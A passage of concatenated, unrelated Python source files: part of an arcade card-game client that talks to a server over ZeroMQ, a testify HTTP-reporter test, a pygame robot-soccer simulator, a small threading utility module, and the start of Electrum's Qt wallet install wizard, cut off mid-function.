                            self.held_cards.append(card)
                            self.held_cards_original_position.append(card.position)
                    elif button == arcade.MOUSE_BUTTON_RIGHT:
                        self.flip_card(primary_card)

    def on_mouse_release(self, x: float, y: float, button: int,
                         modifiers: int):
        """ Called when the user presses a mouse button. """
        # If we don't have any cards, who cares
        if self.card_on_press is None:
            return
        if button == arcade.MOUSE_BUTTON_RIGHT:
            return

        # Find the closest pile, in case we are in contact with more than one
        mat_of_new_pile, distance = clientelements.get_minimum_distance_mat(self.card_on_press, self.pile_mat_list)
        reset_position = True

        # See if we are in contact with the closest pile
        if arcade.check_for_collision(self.card_on_press, mat_of_new_pile):
            # What pile is it?
            new_pile = mat_of_new_pile.cardpile  # self.pile_mat_list.index(pile)
            # Is it the same pile we came from?
            old_pile = self.get_pile_for_card(self.card_on_press)
            if new_pile == old_pile:
                cards = arcade.get_sprites_at_point((x, y), new_pile)
                if len(cards) >= 1:
                    primary_card = cards[-1]
                    if primary_card is not None:
                        if primary_card == self.card_on_press:
                            # did not move position: treat as a click toggling
                            # the card's active (selected) state.
                            if self.card_on_press.active:
                                # if it were active
                                self.card_on_press.active = False
                                self.active_cards.remove(self.card_on_press)
                            else:
                                self.card_on_press.active = True
                                self.active_cards.append(self.card_on_press)
                            self.card_on_press = None
            else:
                # Dropped on a different pile: move everything being held.
                self.move_cards(self.held_cards, new_pile)
                for card in self.active_cards:
                    card.active = False
                self.active_cards = []
                # Success, don't reset position of cards
                reset_position = False

        if reset_position:
            # Where-ever we were dropped, it wasn't valid. Reset the each card's position
            # to its original spot.
            for card_index, card in enumerate(self.held_cards):
                card.position = self.held_cards_original_position[card_index]

        # We are no longer holding cards
        self.held_cards = []
        self.held_cards_original_position = []

    def on_mouse_motion(self, x: float, y: float, dx: float, dy: float):
        """ User moves mouse """
        # If we are holding cards, move them with the mouse
        for card in self.held_cards:
            card.center_x += dx
            card.center_y += dy

    def move_cards(self, cards, new_pile):
        """Move `cards` into `new_pile`, emit a Move event, and apply it locally."""
        old_pile = self.get_pile_for_card(cards[0])
        for i, dropped_card in enumerate(cards):
            new_pile.add_card(dropped_card)
            old_pile.remove_card(dropped_card)
        new_event = gamestate.Event(
            type='Move',
            player_index=self.self_player_index,
            src_pile=old_pile.card_pile_id,
            dst_pile=new_pile.card_pile_id,
            cards=[card.value for card in cards]
        )
        self.event_buffer.append(new_event)
        # Apply locally right away so the UI doesn't wait for the server echo.
        self.game_state.update_from_event(new_event)

    def flip_card(self, card):
        """Flip a single card, emit a Flip event, and apply it locally."""
        new_face = card.face_flipped()
        new_event = gamestate.Event(
            type='Flip',
            player_index=self.self_player_index,
            cards=[card.value],
            cards_status={card.value: new_face}
        )
        self.event_buffer.append(new_event)
        self.game_state.update_from_event(new_event)
        card.face = new_face

    def add_event(self, new_event, local_fast_update=True):
        """Queue an event for the server; optionally apply it locally first."""
        self.event_buffer.append(new_event)
        if local_fast_update:
            self.game_state.update_from_event(new_event)

    def reset_player_and_game(self):
        """Request a full reset of players and game on the server."""
        new_event = gamestate.EventConnect(type='ResetPlayerAndGame')
        self.event_buffer.append(new_event)

    def initiate_game_restart(self):
        """Request the server to start a new game."""
        new_event = gamestate.EventConnect(type='StartNewGame')
        self.event_buffer.append(new_event)
def thread_pusher(window: CardGame, server_ip: str):
    """Background thread: drain the window's event buffer to the server.

    Pushes each queued event as JSON over a ZeroMQ PUSH socket on port
    25001, at most UPDATE_TICK iterations per second.
    """
    ctx = Context()
    push_sock: Socket = ctx.socket(zmq.PUSH)
    push_sock.connect(f'tcp://{server_ip}:25001')
    try:
        while True:
            if window.event_buffer:
                # Fix: pop from the front (FIFO). The previous `pop()` drained
                # the buffer newest-first, which could deliver dependent events
                # out of order (e.g. UpdatePlayerInfo before GetGameState).
                d = window.event_buffer.pop(0)
                msg = dict(counter=1, event=asdict(d))
                print(msg)
                push_sock.send_json(msg)
            time.sleep(1 / UPDATE_TICK)
    finally:
        push_sock.close(1)
        ctx.destroy(linger=1)
def thread_receiver(window: CardGame, server_ip: str):
    """Background thread: SUBscribe to the server's game-state broadcasts.

    Every received JSON message (decoded via gamestate.json_obj_hook) is
    handed to window.update_game_state().  Runs until the process exits.
    """
    ctx = Context()
    sub_sock: Socket = ctx.socket(zmq.SUB)
    sub_sock.connect(f'tcp://{server_ip}:25000')
    sub_sock.subscribe('')
    try:
        while True:
            state_dict = sub_sock.recv_json(object_hook=gamestate.json_obj_hook)
            window.update_game_state(state_dict)
            time.sleep(1 / UPDATE_TICK)
    finally:
        sub_sock.close(1)
        ctx.destroy(linger=1)
def main(args):
    """Entry point: load the YAML game config, build the window and the
    connect view, start the network worker threads, and hand control to
    the arcade event loop."""
    with open(args.game_file) as cfg_file:
        # SafeLoader restricts the YAML to plain data types.
        game_cfg = yaml.load(cfg_file, Loader=yaml.SafeLoader)
    print(game_cfg)
    window = CardGame(game_cfg=game_cfg, title='CARDGAME', resizable=True)
    connect_view = ConnectView()
    connect_view.setup()
    window.show_view(connect_view)
    pusher = threading.Thread(
        target=thread_pusher, args=(window, args.server_ip), daemon=True)
    receiver = threading.Thread(
        target=thread_receiver, args=(window, args.server_ip), daemon=True)
    pusher.start()
    receiver.start()
    arcade.run()


if __name__ == "__main__":
    args = parser.parse_args()
    main(args)
http_reporter_test.py | import json
import threading
import tornado.ioloop
import tornado.httpserver
import tornado.web
import Queue
from testify import assert_equal, setup_teardown, TestCase
from testify.test_runner import TestRunner
from testify.plugins.http_reporter import HTTPReporter
class DummyTestCase(TestCase):
    """Minimal testify case used as a fixture: reporters should see exactly
    one test method named 'test'."""
    # Tell collection tools that this helper class is not itself a test suite.
    __test__ = False

    def test(self):
        """Single no-op test for the reporter to report on."""
        pass
class HTTPReporterTestCase(TestCase):
    """Integration tests for HTTPReporter against an in-process Tornado server.

    NOTE(review): Python 2 era code -- uses the `Queue` module and Tornado's
    private `srv._socket` attribute (removed in newer Tornado); confirm the
    pinned tornado version before porting.
    """

    @setup_teardown
    def make_fake_server(self):
        """Generator fixture: start a throwaway HTTP server on a random port
        before each test (code up to `yield`) and stop it afterwards.

        self.results_reported collects every JSON body POSTed to /results;
        self.status_codes is a queue of error codes the handler should send
        back instead of a 200, one per request, until empty.
        """
        self.results_reported = []
        self.status_codes = Queue.Queue()

        class ResultsHandler(tornado.web.RequestHandler):
            # The request-handler parameter is named 'handler' (not 'self') so
            # the enclosing test case's 'self' stays visible in the closure.
            def post(handler):
                result = json.loads(handler.request.body)
                self.results_reported.append(result)
                try:
                    status_code = self.status_codes.get_nowait()
                    handler.send_error(status_code)
                except Queue.Empty:
                    handler.finish("kthx")

            def get_error_html(handler, status, **kwargs):
                return "error"

        app = tornado.web.Application([(r"/results", ResultsHandler)])
        srv = tornado.httpserver.HTTPServer(app)
        # Port 0 = let the OS pick a free port; read it back from the socket.
        srv.listen(0)
        portnum = srv._socket.getsockname()[1]

        iol = tornado.ioloop.IOLoop.instance()
        thread = threading.Thread(target=iol.start)
        thread.daemon = True  # If for some reason this thread gets blocked, don't prevent quitting.
        thread.start()

        self.connect_addr = "localhost:%d" % portnum

        yield  # the test body runs here

        iol.stop()
        thread.join()

    def test_http_reporter_reports(self):
        """A simple test to make sure the HTTPReporter actually reports things."""
        runner = TestRunner(DummyTestCase, test_reporters=[HTTPReporter(None, self.connect_addr, 'runner1')])
        runner.run()

        (only_result,) = self.results_reported
        assert_equal(only_result['runner_id'], 'runner1')
        assert_equal(only_result['method']['class'], 'DummyTestCase')
        assert_equal(only_result['method']['name'], 'test')

    def test_http_reporter_tries_twice(self):
        """Two queued 409 responses cause the reporter to re-send: the server
        sees the same result payload twice."""
        self.status_codes.put(409)
        self.status_codes.put(409)

        runner = TestRunner(DummyTestCase, test_reporters=[HTTPReporter(None, self.connect_addr, 'tries_twice')])
        runner.run()

        (first, second) = self.results_reported
        assert_equal(first['runner_id'], 'tries_twice')
        assert_equal(first, second)
# vim: set ts=4 sts=4 sw=4 et:
|
main.py | import json
import socket
import threading
import pygame
import ball
import constants
import field
import robot
# Window / rendering setup: one 1200x600 pygame surface shared by all entities.
pygame.init()
screen = pygame.display.set_mode((1200, 600))
# Title and Icon🤖
pygame.display.set_caption('🤖Neon VSS Simulation🤖')
icon = pygame.image.load('resources/icon.png')
pygame.display.set_icon(icon)
clock = pygame.time.Clock()

# UDP endpoints for the external "NoPlan" strategy process: we receive robot
# commands on 5778 and send vision-style state snapshots to 5777.
NOPLAN_LISTENER = ('localhost', 5778)
listener_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
NOPLAN_SENDER = ('localhost', 5777)
sender_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class Game:
    """Top-level simulation: owns the field, ball and robots, renders them with
    pygame, and exchanges JSON state with the NoPlan strategy process over UDP.
    """

    def no_plan_listener(self):
        """Blocking receive loop for strategy messages from NoPlan.

        Runs on a background thread; each datagram's UTF-8 text replaces
        self.message.
        """
        listener_sock.bind(NOPLAN_LISTENER)
        while True:
            data, address = listener_sock.recvfrom(4096)
            if data:
                self.message = data.decode('utf-8')
                print(self.message)

    def sent_to_no_plan(self, data):
        """Serialise *data* to JSON and send it to the NoPlan process."""
        sender_sock.sendto(bytes(json.dumps(data), 'utf-8'), NOPLAN_SENDER)

    def __init__(self, blue_robots=None, yellow_robots=None, ball_pos=(0, 0)):
        """Build the field, the ball and both teams.

        blue_robots / yellow_robots: lists of dicts with 'start_position',
        'orientation', 'radio_id' and 'vision_id' keys (see match_config.json).
        """
        if yellow_robots is None:
            yellow_robots = []
        if blue_robots is None:
            blue_robots = []
        # Last strategy message received from NoPlan (JSON text); empty until
        # the first datagram arrives.
        self.message = ''
        # BUGFIX: build_for_noplan() reads self.timestamp, but it was only
        # initialised inside start(); set it here so the object is consistent.
        self.timestamp = 0
        self.field = field.Field()
        self.ball = ball.Ball(pos=ball_pos)
        self.robots = []
        self.running = False
        for robot_ in blue_robots:
            self.robots.append(
                robot.Robot('blue', self.field, robot_['start_position'], robot_['orientation'],
                            radio_id=robot_['radio_id'], vision_id=robot_['vision_id'])
            )
        for robot_ in yellow_robots:
            self.robots.append(
                robot.Robot('yellow', self.field, robot_['start_position'], robot_['orientation'],
                            radio_id=robot_['radio_id'], vision_id=robot_['vision_id'])
            )

    def build_for_noplan(self):
        """Return a vision-style snapshot dict of all entities for NoPlan.

        Increments self.timestamp on every call (used as 't_capture').
        """
        self.timestamp += 1
        entities_data = {
            't_capture': self.timestamp,
            'robots_blue': [
                {
                    'x': r.position[0],
                    'y': r.position[1],
                    'orientation': r.orientation,
                    'robot_id': r.vision_id
                } for r in self.robots if r.team_color == 'blue'
            ],
            'robots_yellow': [
                {
                    'x': r.position[0],
                    'y': r.position[1],
                    'orientation': r.orientation,
                    'robot_id': r.vision_id
                } for r in self.robots if r.team_color == 'yellow'
            ],
            'balls': [{'x': self.ball.position[0], 'y': self.ball.position[1], 'speed': {'x': 0, 'y': 0}}]}
        data = {
            'detection': entities_data,
            'geometry': {}
        }
        return data

    def start(self):
        """Run the render/update loop until the window is closed."""
        self.timestamp = 0
        self.running = True
        # BUGFIX: daemon thread -- the listener blocks forever in recvfrom(),
        # and a non-daemon thread kept the process alive after the window
        # was closed.
        listener_thread = threading.Thread(target=self.no_plan_listener, daemon=True)
        listener_thread.start()
        while self.running:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    self.running = False
                if event.type == pygame.MOUSEBUTTONUP:
                    # A click teleports the ball: map window pixels to field
                    # coordinates (centre origin, 2x scale).
                    pos = pygame.mouse.get_pos()
                    w, h = pygame.display.get_surface().get_size()
                    self.ball.position = (pos[0] - w/2)*2, (pos[1] - h/2)*2
            screen.fill(constants.COLORS.NEON_BLACK)
            self.field.update(screen)
            self.ball.update(screen)
            for rb in self.robots:
                # BUGFIX: the old bare `except: pass` wrapped the update calls
                # too, so robots were silently not drawn until the first valid
                # strategy message AND any error inside rb.update() was hidden.
                # Only the message parsing is best-effort now.
                try:
                    rb_message = list(filter(lambda x: x[0] == rb.vision_id, json.loads(self.message)))
                except (TypeError, ValueError):
                    # No (valid) strategy message yet.
                    rb_message = []
                if rb_message:
                    rb.update(screen, rb_message[0])
                else:
                    rb.update(screen, [0, 1, 0, 0])
            pygame.display.update()
            self.sent_to_no_plan(self.build_for_noplan())
if __name__ == '__main__':
    # Use a context manager so the config file handle is closed promptly
    # (the old code leaked it), and guard with __main__ so importing this
    # module no longer launches a match as a side effect.
    with open('match_config.json', 'r') as cfg_file:
        config = json.load(cfg_file)
    match = Game(**config)
    match.start()
|
common.py | import os
import threading
def threaded(fn):
    """Decorator: run *fn* on a freshly started thread.

    The wrapped call returns the started threading.Thread object so the
    caller may join() it.  functools.wraps preserves the decorated
    function's name/docstring (the old wrapper hid them).
    """
    import functools

    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
        thread.start()
        return thread
    return wrapper
def path_hierarchy(path):
    """Return a nested representation of the directory tree rooted at *path*.

    Directories become ``{basename: [child, ...]}`` (children recursively in
    the same format); a path that cannot be listed (regular file, permission
    error, ...) collapses to its basename string, or to ``[]`` when the
    basename is empty (e.g. a path ending in a separator).
    """
    name = os.path.basename(path)
    try:
        return {
            name: [
                path_hierarchy(os.path.join(path, entry))
                for entry in os.listdir(path)
            ]
        }
    except OSError:
        # os.listdir failed: fall through to the leaf cases below.
        # (The old code bound the exception to an unused variable.)
        pass
    if name == "":
        return []
    return name
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
# User-facing wizard strings; _() marks them for i18n translation.
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
                            + _("Your wallet file does not contain secrets, mostly just metadata. ") \
                            + _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
                            + _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
# Help text shown next to key entry when show_wif_help is enabled
# (see add_xpub_dialog below).
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
                 _('A few examples') + ':\n' +
                 'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
                 'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
                 'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
                                + _("You have multiple consecutive whitespaces or leading/trailing "
                                    "whitespaces in your passphrase.") + " " \
                                + _("This is discouraged.") + " " \
                                + _("Due to a bug, old versions of Electrum will NOT be creating the "
                                    "same wallet as newer versions or other software.")
class CosignWidget(QWidget):
    """Pie-chart widget visualising an m-of-n multisig scheme: n equal
    wedges, the first m drawn green (required signatures), the rest gray."""
    # Fixed square edge length in pixels.
    size = 120

    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m
        self.n = n

    def set_n(self, n):
        """Update the total cosigner count and repaint."""
        self.n = n
        self.update()

    def set_m(self, m):
        """Update the required-signature count and repaint."""
        self.m = m
        self.update()

    def paintEvent(self, event):
        """Draw the n wedges; wedge i is green when i < m."""
        bgcolor = self.palette().color(QPalette.Background)
        pen = QPen(bgcolor, 7, Qt.SolidLine)
        qp = QPainter()
        qp.begin(self)
        qp.setPen(pen)
        qp.setRenderHint(QPainter.Antialiasing)
        qp.setBrush(Qt.gray)
        for i in range(self.n):
            # Qt pie angles are measured in 1/16ths of a degree.
            alpha = int(16* 360 * i/self.n)
            alpha2 = int(16* 360 * 1/self.n)
            qp.setBrush(Qt.green if i<self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
        qp.end()
def wizard_dialog(func):
    """Decorator for InstallWizard page methods.

    Reads 'run_next' from kwargs, runs the page, and forwards the page's
    return value(s) to run_next (wrapping a non-tuple result in a 1-tuple).
    If the page raises GoBack, the wizard either rewinds one step or, when
    already at the first page, closes and re-raises.
    """
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]  # type: InstallWizard
        # First page has nothing to go back to, so the button reads 'Cancel'.
        wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
        try:
            out = func(*args, **kwargs)
            if type(out) is not tuple:
                out = (out,)
            run_next(*out)
        except GoBack:
            if wizard.can_go_back():
                wizard.go_back()
                return
            else:
                wizard.close()
                raise
    return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
    """Raised by InstallWizard.select_storage() when the chosen wallet file
    is already loaded by the daemon; ``wallet`` holds the open instance."""
    def __init__(self, wallet: Abstract_Wallet):
        super().__init__()
        self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
    """Qt install/recovery wizard for Electrum wallets.

    Combines BaseWizard's page state machine with a modal QDialog.  Each
    page builds a Qt layout and hands it to exec_layout(), which blocks on
    a private QEventLoop until the user acts: exit code 0 = dialog closed,
    1 = Back, 2 = Next.
    """

    accept_signal = pyqtSignal()

    def __init__(self, config, app, plugins):
        BaseWizard.__init__(self, config, plugins)
        QDialog.__init__(self, None)
        self.setWindowTitle('Electrum - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        # Local event loop: every wizard page blocks on it; the buttons and
        # dialog rejection wake it with a distinct exit code (0/1/2).
        self.loop = QEventLoop()
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon('electrum.png')
        self.show()
        self.raise_()
        self.refresh_gui()  # Need for QT on MacOSX.  Lame.

    def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
        """First wizard page: pick (or create) a wallet file.

        Returns (path, storage) where storage is None when the file does not
        exist yet.  Raises UserCancelled on cancel and
        WalletAlreadyOpenInMemory when the daemon already holds the wallet.
        """
        vbox = QVBoxLayout()
        hbox = QHBoxLayout()
        hbox.addWidget(QLabel(_('Wallet') + ':'))
        self.name_e = QLineEdit()
        hbox.addWidget(self.name_e)
        button = QPushButton(_('Choose...'))
        hbox.addWidget(button)
        vbox.addLayout(hbox)
        self.msg_label = QLabel('')
        vbox.addWidget(self.msg_label)
        hbox2 = QHBoxLayout()
        self.pw_e = QLineEdit('', self)
        self.pw_e.setFixedWidth(150)
        # Echo mode 2 == QLineEdit.Password (masked input).
        self.pw_e.setEchoMode(2)
        self.pw_label = QLabel(_('Password') + ':')
        hbox2.addWidget(self.pw_label)
        hbox2.addWidget(self.pw_e)
        hbox2.addStretch()
        vbox.addLayout(hbox2)
        self.set_layout(vbox, title=_('Electrum wallet'))

        self.temp_storage = WalletStorage(path, manual_upgrades=True)
        wallet_folder = os.path.dirname(self.temp_storage.path)

        def on_choose():
            path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
            if path:
                self.name_e.setText(path)

        def on_filename(filename):
            # Re-evaluate the chosen filename: update self.temp_storage, the
            # explanatory message and whether the password field is shown.
            path = os.path.join(wallet_folder, filename)
            wallet_from_memory = get_wallet_from_daemon(path)
            try:
                if wallet_from_memory:
                    self.temp_storage = wallet_from_memory.storage
                else:
                    self.temp_storage = WalletStorage(path, manual_upgrades=True)
                self.next_button.setEnabled(True)
            except BaseException:
                traceback.print_exc(file=sys.stderr)
                self.temp_storage = None
                self.next_button.setEnabled(False)
            user_needs_to_enter_password = False
            if self.temp_storage:
                if not self.temp_storage.file_exists():
                    msg = _("This file does not exist.") + '\n' \
                          + _("Press 'Next' to create this wallet, or choose another file.")
                elif not wallet_from_memory:
                    if self.temp_storage.is_encrypted_with_user_pw():
                        msg = _("This file is encrypted with a password.") + '\n' \
                              + _('Enter your password or choose another file.')
                        user_needs_to_enter_password = True
                    elif self.temp_storage.is_encrypted_with_hw_device():
                        msg = _("This file is encrypted using a hardware device.") + '\n' \
                              + _("Press 'Next' to choose device to decrypt.")
                    else:
                        msg = _("Press 'Next' to open this wallet.")
                else:
                    msg = _("This file is already open in memory.") + "\n" \
                          + _("Press 'Next' to create/focus window.")
            else:
                msg = _('Cannot read file')
            self.msg_label.setText(msg)
            if user_needs_to_enter_password:
                self.pw_label.show()
                self.pw_e.show()
                self.pw_e.setFocus()
            else:
                self.pw_label.hide()
                self.pw_e.hide()

        button.clicked.connect(on_choose)
        self.name_e.textChanged.connect(on_filename)
        n = os.path.basename(self.temp_storage.path)
        self.name_e.setText(n)

        # Loop until the selected file is usable (new file, plaintext file,
        # or an encrypted file we managed to decrypt).
        while True:
            if self.loop.exec_() != 2:  # 2 = next
                raise UserCancelled
            if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
                break
            if not self.temp_storage.file_exists():
                break
            wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
            if wallet_from_memory:
                raise WalletAlreadyOpenInMemory(wallet_from_memory)
            if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
                if self.temp_storage.is_encrypted_with_user_pw():
                    password = self.pw_e.text()
                    try:
                        self.temp_storage.decrypt(password)
                        break
                    except InvalidPassword as e:
                        self.show_message(title=_('Error'), msg=str(e))
                        continue
                    except BaseException as e:
                        self.logger.exception('')
                        self.show_message(title=_('Error'), msg=str(e))
                        raise UserCancelled()
                elif self.temp_storage.is_encrypted_with_hw_device():
                    try:
                        self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
                    except InvalidPassword as e:
                        self.show_message(title=_('Error'),
                                          msg=_('Failed to decrypt using this hardware device.') + '\n' +
                                              _('If you use a passphrase, make sure it is correct.'))
                        # Restart this page from scratch after a bad passphrase.
                        self.reset_stack()
                        return self.select_storage(path, get_wallet_from_daemon)
                    except BaseException as e:
                        self.logger.exception('')
                        self.show_message(title=_('Error'), msg=str(e))
                        raise UserCancelled()
                    if self.temp_storage.is_past_initial_decryption():
                        break
                    else:
                        raise UserCancelled()
                else:
                    raise Exception('Unexpected encryption version')

        return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None)

    def run_upgrades(self, storage):
        """Handle legacy storage: account splitting, incomplete wallets and
        format upgrades.  May raise UserCancelled or WalletFileException."""
        path = storage.path
        if storage.requires_split():
            self.hide()
            msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
                    "Do you want to split your wallet into multiple files?").format(path)
            if not self.question(msg):
                return
            file_list = '\n'.join(storage.split_accounts())
            msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
            if self.question(msg):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            # raise now, to avoid having the old storage opened
            raise UserCancelled()

        action = storage.get_action()
        if action and storage.requires_upgrade():
            raise WalletFileException('Incomplete wallet files cannot be upgraded.')
        if action:
            self.hide()
            msg = _("The file '{}' contains an incompletely created wallet.\n"
                    "Do you want to complete its creation now?").format(path)
            if not self.question(msg):
                if self.question(_("Do you want to delete '{}'?").format(path)):
                    os.remove(path)
                    self.show_warning(_('The file was removed'))
                return
            self.show()
            self.data = storage.db.data  # FIXME
            self.run(action)
            for k, v in self.data.items():
                storage.put(k, v)
            storage.write()
            return

        if storage.requires_upgrade():
            self.upgrade_storage(storage)

    def finished(self):
        """Called in hardware client wrapper, in order to close popups."""
        return

    def on_error(self, exc_info):
        """Show (and log) any non-cancel exception raised by a wizard task."""
        if not isinstance(exc_info[1], UserCancelled):
            traceback.print_exception(*exc_info)
            self.show_error(str(exc_info[1]))

    def set_icon(self, filename):
        """Swap the side logo; returns the previously shown icon filename."""
        prior_filename, self.icon_filename = self.icon_filename, filename
        self.logo.setPixmap(QPixmap(icon_path(filename))
                            .scaledToWidth(60, mode=Qt.SmoothTransformation))
        return prior_filename

    def set_layout(self, layout, title=None, next_enabled=True):
        """Install *layout* as the current page content (without blocking)."""
        self.title.setText("<b>%s</b>"%title if title else "")
        self.title.setVisible(bool(title))
        # Get rid of any prior layout by assigning it to a temporary widget
        prior_layout = self.main_widget.layout()
        if prior_layout:
            QWidget().setLayout(prior_layout)
        self.main_widget.setLayout(layout)
        self.back_button.setEnabled(True)
        self.next_button.setEnabled(next_enabled)
        if next_enabled:
            self.next_button.setFocus()
        self.main_widget.setVisible(True)
        self.please_wait.setVisible(False)

    def exec_layout(self, layout, title=None, raise_on_cancel=True,
                    next_enabled=True):
        """Show *layout* and block until the user acts.

        Raises UserCancelled on close (when raise_on_cancel) and GoBack on
        the Back button; otherwise returns the event-loop exit code and
        switches the page into the 'please wait' state.
        """
        self.set_layout(layout, title, next_enabled)
        result = self.loop.exec_()
        if not result and raise_on_cancel:
            raise UserCancelled
        if result == 1:
            raise GoBack from None
        self.title.setVisible(False)
        self.back_button.setEnabled(False)
        self.next_button.setEnabled(False)
        self.main_widget.setVisible(False)
        self.please_wait.setVisible(True)
        self.refresh_gui()
        return result

    def refresh_gui(self):
        # For some reason, to refresh the GUI this needs to be called twice
        self.app.processEvents()
        self.app.processEvents()

    def remove_from_recently_open(self, filename):
        """Forget *filename* in the recently-open wallet list."""
        self.config.remove_from_recently_open(filename)

    def text_input(self, title, message, is_valid, allow_multi=False):
        """Page: free-form key/text entry validated by *is_valid*."""
        slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
                             allow_multi=allow_multi)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_text()

    def seed_input(self, title, message, is_seed, options):
        """Page: seed phrase entry; returns (seed, is_bip39, is_ext)."""
        slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_seed(), slayout.is_bip39, slayout.is_ext

    @wizard_dialog
    def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
        """Page: enter an xpub/xprv (optionally with WIF help shown)."""
        header_layout = QHBoxLayout()
        label = WWLabel(message)
        label.setMinimumWidth(400)
        header_layout.addWidget(label)
        if show_wif_help:
            header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        return self.text_input(title, header_layout, is_valid, allow_multi)

    @wizard_dialog
    def add_cosigner_dialog(self, run_next, index, is_valid):
        """Page: enter cosigner *index*'s master public (or private) key."""
        title = _("Add Cosigner") + " %d"%index
        message = ' '.join([
            _('Please enter the master public key (xpub) of your cosigner.'),
            _('Enter their master private key (xprv) if you want to be able to sign for them.')
        ])
        return self.text_input(title, message, is_valid)

    @wizard_dialog
    def restore_seed_dialog(self, run_next, test):
        """Page: enter an existing seed phrase to restore a wallet."""
        options = []
        if self.opt_ext:
            options.append('ext')
        if self.opt_bip39:
            options.append('bip39')
        title = _('Enter Seed')
        message = _('Please enter your seed phrase in order to restore your wallet.')
        return self.seed_input(title, message, test, options)

    @wizard_dialog
    def confirm_seed_dialog(self, run_next, test):
        """Page: retype the freshly generated seed to confirm it was saved."""
        # Clear the clipboard so the seed cannot simply be pasted back.
        self.app.clipboard().clear()
        title = _('Confirm Seed')
        message = ' '.join([
            _('Your seed is important!'),
            _('If you lose your seed, your money will be permanently lost.'),
